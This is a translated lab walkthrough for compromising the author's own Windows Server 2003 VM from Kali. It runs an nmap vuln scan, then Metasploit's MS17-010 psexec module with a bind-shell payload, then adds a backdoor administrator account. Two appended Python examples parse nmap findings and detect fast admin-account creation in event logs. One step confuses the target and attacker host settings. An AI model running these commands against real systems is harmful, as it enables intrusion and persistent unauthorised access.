Kali's Metasploit Framework: exploiting a vulnerability to break into Windows 2003 Server






For the lab setup, see the previous post: https://blog.csdn.net/qq_41709494/article/details/89278964

#Build the Windows 2003 Server target in VMware; its IP address is 192.168.137.128.



#Some of the details were shown only in screenshots and are omitted here.



#Host-only network mode: giving the Windows 2003 Server internet access

#Tick "Allow other network users to connect through this computer's Internet connection" and select the network card VMware Network Adapter VMnet1. The figure below shows the LAN adapter configured to use the IP address 192.168.137.1.

#Note: the network number must be 192.168.137.0. When selecting the network card, make sure it is VMware's host-only mode adapter.



#Set the subnet IP to 192.168.37.0 and start DHCP as shown in the figure above.

#Pinging Baidu succeeds, so the machine can reach the internet.


#Kali is built in VirtualBox and reached from Xshell over its host-only network IP only. Kali's host-only IP is 192.168.30.3.

#Connect with Xshell and check Kali's IP address.

#nmap vulnerability scan

```
root@xxxxx:~# nmap --script=vuln 192.168.137.128   # --script=vuln: run the vulnerability scripts against this IP

Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 22:23 CST
Nmap scan report for 192.168.137.128
Host is up (1.0s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_sslv2-drown:
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 150.48 seconds
```
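The scan above mixes real findings (State: VULNERABLE) with negatives, NT_STATUS codes and script errors, so a defender triaging many hosts wants only the confirmed ones. The following is an added example, not code from the original post, that parses the host-script section of normal `nmap --script=vuln` output into per-script results and keeps the VULNERABLE ones with their CVE ids; the embedded sample is an excerpt of the scan result shown on this page.

```python
import re
# Excerpt of the nmap --script=vuln host-script output shown on this page (descriptions
# and reference URLs dropped); not a new scan.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.137.128
| smb-vuln-ms08-067:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
"""

def parse_nmap_vuln(text):
    """One {host, script, state, cves} dict per NSE script result in normal nmap output."""
    findings, host, current = [], None, None
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            host, current = m.group(1), None
            continue
        # A result starts at "| name:" or "|_name: value"; deeper-indented lines belong to it.
        m = re.match(r"^\|[ _]([\w-]+):\s*(.*)$", line)
        if m:
            current = {"host": host, "script": m.group(1), "state": m.group(2) or "UNKNOWN", "cves": []}
            findings.append(current)
            continue
        if current is None:
            continue
        m = re.match(r"^\|\s+State:\s*(\S+)", line)
        if m:
            current["state"] = m.group(1)
        for cve in re.findall(r"CVE-\d{4}-\d{4,}", line):  # reference URLs repeat the id, so dedupe
            if cve not in current["cves"]:
                current["cves"].append(cve)
    return findings

def vulnerable_by_host(text):
    """host -> [(script, cves)] for results whose State is VULNERABLE, i.e. the remediation list."""
    out = {}
    for f in parse_nmap_vuln(text):
        if f["state"] == "VULNERABLE":
            out.setdefault(f["host"], []).append((f["script"], f["cves"]))
    return out
```

For the page's own output this yields two confirmed findings for 192.168.137.128, MS08-067 and MS17-010, while the `false`, `NT_STATUS_OBJECT_NAME_NOT_FOUND` and `ERROR` results are kept only in the full list.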

#The MS17-010 vulnerability

#metasploit-framework

#Search for the vulnerability module

```
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```

```
msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) >
```

#Show module information

```
msf5 exploit(windows/smb/ms17_010_psexec) > info

       Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
     Module: exploit/windows/smb/ms17_010_psexec
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-03-14

Provided by:
  sleepya
  zerosum0x0
  Shadow Brokers
  Equation Group

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   PowerShell
  2   Native upload
  3   MOF upload

Check supported:
  No

Basic options:
  Name                  Current Setting                                                 Required  Description
  ----                  ---------------                                                 --------  -----------
  DBGTRACE              false                                                           yes       Show extra debug trace info
  LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
  NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
  NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
  RHOSTS                                                                                yes       The target address range or CIDR identifier
  RPORT                 445                                                             yes       The Target port
  SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
  SERVICE_DISPLAY_NAME                                                                  no        The service display name
  SERVICE_NAME                                                                          no        The service name
  SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
  SMBDomain             .                                                               no        The Windows domain to use for authentication
  SMBPass                                                                               no        The password for the specified username
  SMBUser                                                                               no        The username to authenticate as

Payload information:
  Space: 3072

Description:
  This module will exploit SMB with vulnerabilities in MS17-010 to
  achieve a write-what-where primitive. This will then be used to
  overwrite the connection session information with as an
  Administrator session. From there, the normal psexec payload code
  execution is done.

  Exploits a type confusion between Transaction and WriteAndX requests
  and a race condition in Transaction requests, as seen in the
  EternalRomance, EternalChampion, and EternalSynergy exploits. This
  exploit chain is more reliable than the EternalBlue exploit, but
  requires a named pipe.

References:
  https://technet.microsoft.com/en-us/library/security/MS17-010
  https://cvedetails.com/cve/CVE-2017-0143/
  https://cvedetails.com/cve/CVE-2017-0146/
  https://cvedetails.com/cve/CVE-2017-0147/
  https://github.com/worawit/MS17-010
  https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
  https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/

AKA:
  ETERNALSYNERGY
  ETERNALROMANCE
  ETERNALCHAMPION
  ETERNALBLUE
```

#Show the module's option settings

```
msf5 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic
```

#The payload is the code executed on the remote host after exploitation; here it makes the target machine hand over a shell.

```
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
```

#Set the IP address of the target to attack

```
msf5 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.137.128
rhosts => 192.168.137.128
```

#Set the host IP for the reverse connection

```
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.30.3
rhost => 192.168.30.3
```

```
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
```

#Windows 2003 Server

#Xshell shows garbled characters; switch its encoding to GBK.

#Privilege escalation

#Create the user abc with the password 123456

```
C:\WINDOWS\system32>net user abc 123456 /add
net user abc 123456 /add
The command completed successfully.
```

#Add it to the administrators group

```
C:\WINDOWS\system32>net localgroup administrators abc /add
net localgroup administrators abc /add
The command completed successfully.
```

#View user abc
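On the defender's side, the two `net` commands above leave a distinctive trace in the Windows Security log: an account-creation event followed within seconds by an addition to the Administrators group, both attributed to the exploited service's context rather than to an administrator's own session. The following is an added example, not code from the original post, that correlates those two events over constructed sample records; it accepts both the Windows Server 2003 event IDs (624 user account created, 636 member added to a security-enabled local group) and the 4720/4732 IDs written by later Windows versions.

```python
from datetime import datetime, timedelta

# Constructed sample Security-log records (not real logs). Windows Server 2003 writes
# 624 (user account created) and 636 (member added to a security-enabled local group);
# Windows Vista/2008 and later write 4720 and 4732 for the same actions.
SAMPLE_EVENTS = [
    {"time": "2019-04-16 22:40:12", "id": 624, "subject": "SYSTEM", "target": "abc", "group": None},
    {"time": "2019-04-16 22:40:31", "id": 636, "subject": "SYSTEM", "target": "abc", "group": "Administrators"},
    {"time": "2019-04-16 09:05:00", "id": 4720, "subject": "admin01", "target": "svc-backup", "group": None},
    {"time": "2019-04-16 15:30:00", "id": 4732, "subject": "admin01", "target": "svc-backup", "group": "Administrators"},
    {"time": "2019-04-16 10:00:00", "id": 624, "subject": "helpdesk", "target": "jdoe", "group": None},
    {"time": "2019-04-16 10:00:40", "id": 636, "subject": "helpdesk", "target": "jdoe", "group": "Remote Desktop Users"},
]

ACCOUNT_CREATED = {624, 4720}
LOCAL_GROUP_MEMBER_ADDED = {636, 4732}
PRIVILEGED_GROUPS = {"administrators"}


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def find_fast_admin_creations(events, window_minutes=10):
    """Return (account, creating_subject, seconds_between) for every account that was
    created and then added to a privileged local group within window_minutes.
    A short gap, especially with SYSTEM as the subject instead of an administrator's
    own session, matches the pattern of a post-exploitation backdoor account."""
    created, hits = {}, []
    for e in sorted(events, key=lambda ev: _ts(ev["time"])):
        name = e["target"].lower()
        if e["id"] in ACCOUNT_CREATED:
            created[name] = e
        elif e["id"] in LOCAL_GROUP_MEMBER_ADDED and (e["group"] or "").lower() in PRIVILEGED_GROUPS:
            c = created.get(name)
            if c is None:
                continue  # added to Administrators, but not created in this log window
            gap = _ts(e["time"]) - _ts(c["time"])
            if gap <= timedelta(minutes=window_minutes):
                hits.append((e["target"], c["subject"], int(gap.total_seconds())))
    return hits


if __name__ == "__main__":
    for account, subject, secs in find_fast_admin_creations(SAMPLE_EVENTS):
        print(f"ALERT: {account} created by {subject} and made Administrator after {secs}s")
```

With the default 10-minute window only the `abc` account is flagged; the legitimate `svc-backup` change hours later and the non-privileged `jdoe` addition are not.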